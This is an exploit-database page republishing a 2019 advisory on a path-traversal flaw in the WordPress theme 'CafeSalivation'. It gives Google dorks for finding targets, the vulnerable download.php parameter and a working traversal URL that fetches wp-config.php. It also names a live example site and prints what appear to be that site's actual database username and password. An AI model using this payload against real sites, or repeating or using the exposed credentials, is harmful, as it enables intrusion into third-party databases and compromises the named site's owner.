Advertisement






WordPress 4.x CafeSalivation Themes Database Configuration File Download

CVE Category Price Severity
Not provided CWE-16 Not provided Not provided
Author Risk Exploitation Type Date
Not provided Not provided Not provided 2019-03-21
CPE
cpe:cpe:/a:wordpress:wordpress:4.x
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030177

Below is a copy:

WordPress 4.x CafeSalivation Themes Database Configuration File Download
############################################################################################

# Exploit Title : WordPress 4.x CafeSalivation Themes Database Configuration File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/03/2019
# Vendor Homepage : cafesalivation.com - verzdesign.com
# Software Information Link : verzdesign.com/our-services/web-development/corporate-web-design
# Software Affected Version : 4.x
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : inurl:/wp-content/themes/cafesalivation/
intext:Web Design by Verz
# Vulnerability Type : 
CWE-16 [ Configuration ]
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

############################################################################################

# Description about Software :
***************************
Verz Design is an established web design and web development company in Singapore. 

############################################################################################

# Impact :
***********
* WordPress 4.x CafeSalivation Themes is prone to a vulnerability that lets attackers download database config file because 

the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files 

within the context of the web server process and obtain potentially sensitive informations. 

* An information exposure is the intentional or unintentional disclosure  of information to an actor that is not explicitly authorized 

to have access to that information. * The software has Relative Path Traversal vulnerability and it uses external input to construct 

a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve 

to a location that is outside of that directory.

############################################################################################

# Vulnerable File :
****************
/download.php

# Vulnerable Parameter :
**********************
?filename=

# Database Configuration File Download Exploit :
*******************************************
/wp-content/themes/cafesalivation/download.php?filename=../../wp-config.php

Informations About MySQL Database Configuration File =>
****************************************************
** The name of the database for WordPress */
define('DB_NAME', '');

/** MySQL database username */
define('DB_USER', '');

/** MySQL database password */
define('DB_PASSWORD', '');

/** MySQL hostname */
define('DB_HOST', '');

############################################################################################

# Example Vulnerable Sites :
*************************
[+] cafesalivation.com/wp-content/themes/cafesalivation/download.php?filename=../../wp-config.php

** The name of the database for WordPress 
*/
define('DB_NAME', 'adminca_cafesalivation');

/
** MySQL database username 
*/
define('DB_USER', 'adminca_cafesal');

/
** MySQL database password 
*/
define('DB_PASSWORD', '!JHZz~_svLsE');

/
** MySQL hostname */
define('DB_HOST', 'localhost');

/
** Database Charset to use in creating database tables. 
*/
define('DB_CHARSET', 'utf8');

/
** The Database Collate type. Don't change this if in doubt. 
*/
define('DB_COLLATE', '');

/**#@+
 

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

############################################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum